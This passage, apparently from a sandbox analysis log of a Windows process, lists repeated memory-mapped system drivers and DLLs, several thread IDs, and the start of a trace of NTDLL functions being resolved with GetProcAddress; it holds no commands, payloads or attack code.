"c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 3196 start_va = 0x1cd0000 end_va = 0x1de0fff monitored = 0 entry_point = 0x1dc1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 3197 start_va = 0x5a0000 end_va = 0x5affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3198 start_va = 0x5b0000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3199 start_va = 0x5a0000 end_va = 0x5affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3200 start_va = 0x5b0000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3201 start_va = 0x5a0000 end_va = 0x5affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3202 start_va = 0x5b0000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3203 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 3204 start_va = 0x1610000 end_va = 0x16befff monitored = 0 entry_point = 0x1687000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 3205 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 3206 start_va = 0x1610000 end_va = 0x16befff monitored = 0 entry_point = 0x1687000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 3207 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 3208 start_va = 0x1610000 end_va = 0x16befff monitored = 0 entry_point = 0x1687000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 3209 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 3210 start_va = 0x1610000 end_va = 0x16befff monitored = 0 entry_point = 0x1687000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 3211 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 3212 start_va = 0x1610000 end_va = 0x16befff monitored = 0 entry_point = 0x1687000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 3213 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 3214 start_va = 0x1610000 end_va = 0x16befff monitored = 0 entry_point = 0x1687000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 3215 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 3216 start_va = 0xd10000 end_va = 0xd70fff monitored = 0 entry_point = 0xd20770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 3217 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 3218 start_va = 0xd10000 end_va = 0xd70fff monitored = 0 entry_point = 0xd20770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 3219 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 3220 start_va = 0xd10000 end_va = 0xd70fff monitored = 0 entry_point = 0xd20770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 3221 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 3222 start_va = 0xd10000 end_va = 0xd70fff monitored = 0 entry_point = 0xd20770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 3223 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 3224 start_va = 0xd10000 end_va = 0xd70fff monitored = 0 entry_point = 0xd20770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 3225 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 3226 start_va = 0xd10000 end_va = 0xd70fff monitored = 0 entry_point = 0xd20770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 3227 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3228 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3229 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3230 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3231 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3232 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3233 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3234 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3235 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3236 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3237 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3238 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3239 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3240 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3241 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3242 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3243 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3244 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3245 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3246 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3247 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3248 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3249 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3250 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3251 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3252 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3253 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3254 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3255 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3256 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3257 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3258 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3259 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3260 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3261 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3262 start_va = 0x1cd0000 end_va = 0x1deffff monitored = 0 entry_point = 0x1dcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3263 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3264 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3265 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3266 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3267 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3268 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3269 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3270 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3271 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3272 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3273 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3274 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3275 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3276 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3277 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3278 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3279 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3280 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3281 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3282 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3283 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3284 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3285 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3286 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3287 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3288 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3289 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3290 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3291 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3292 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3293 start_va = 0x5a0000 end_va = 0x5affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mrxsmb.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\mrxsmb.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\mrxsmb.sys.mui") Region: id = 3294 start_va = 0xd10000 end_va = 0xd81fff monitored = 0 entry_point = 0xd67000 region_type = mapped_file name = "mrxsmb.sys" filename = "\\Windows\\System32\\drivers\\mrxsmb.sys" (normalized: "c:\\windows\\system32\\drivers\\mrxsmb.sys") Region: id = 3295 start_va = 0x5a0000 end_va = 0x5affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mrxsmb.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\mrxsmb.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\mrxsmb.sys.mui") Region: id = 3296 start_va = 0xd10000 end_va = 0xd81fff monitored = 0 entry_point = 0xd67000 region_type = mapped_file name = "mrxsmb.sys" filename = "\\Windows\\System32\\drivers\\mrxsmb.sys" (normalized: "c:\\windows\\system32\\drivers\\mrxsmb.sys") Region: id = 3297 start_va = 0x7ffda0bd0000 end_va = 0x7ffda0bddfff monitored = 0 entry_point = 0x7ffda0bd2b10 region_type = mapped_file name = "perfos.dll" filename = "\\Windows\\System32\\perfos.dll" (normalized: "c:\\windows\\system32\\perfos.dll") Thread: id = 112 os_tid = 0x13f8 Thread: id = 113 os_tid = 0x138c Thread: id = 114 os_tid = 0xdf8 [0263.938] malloc (_Size=0xb0) returned 0xd9cb70 [0263.938] LoadLibraryExW (lpLibFileName="NTDLL.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffdab590000 [0263.939] GetProcAddress (hModule=0x7ffdab590000, lpProcName="RtlInitUnicodeString") returned 0x7ffdab5aced0 [0263.939] GetProcAddress (hModule=0x7ffdab590000, lpProcName="RtlFreeUnicodeString") returned 0x7ffdab5ac680 [0263.939] GetProcAddress (hModule=0x7ffdab590000, lpProcName="NtSetSystemEnvironmentValue") returned 0x7ffdab637f10 [0263.939] GetProcAddress (hModule=0x7ffdab590000, lpProcName="NtQuerySystemEnvironmentValue") returned 0x7ffdab637630 [0263.939] GetProcAddress (hModule=0x7ffdab590000, lpProcName="NtCreateFile") returned 0x7ffdab6357e0 [0263.939] GetProcAddress (hModule=0x7ffdab590000, lpProcName="NtQuerySystemInformation") returned 0x7ffdab635400 [0263.940] GetProcAddress (hModule=0x7ffdab590000, lpProcName="NtQueryDirectoryObject") returned 0x7ffdab6372f0 [0263.940] GetProcAddress (hModule=0x7ffdab590000, lpProcName="NtQueryObject") returned 0x7ffdab634f40 [0263.940] GetProcAddress (hModule=0x7ffdab590000, lpProcName="NtOpenDirectoryObject") returned 0x7ffdab635840 [0263.940] GetProcAddress (hModule=0x7ffdab590000, lpProcName="NtQueryInformationProcess") returned 0x7ffdab635060 [0263.940] GetProcAddress (hModule=0x7ffdab590000, lpProcName="NtQueryInformationToken") returned 0x7ffdab635160 [0263.940] GetProcAddress (hModule=0x7ffdab590000, lpProcName="NtOpenFile") returned 0x7ffdab6353a0 [0263.940] GetProcAddress (hModule=0x7ffdab590000, lpProcName="NtClose") returned 0x7ffdab634f20 [0263.941] GetProcAddress 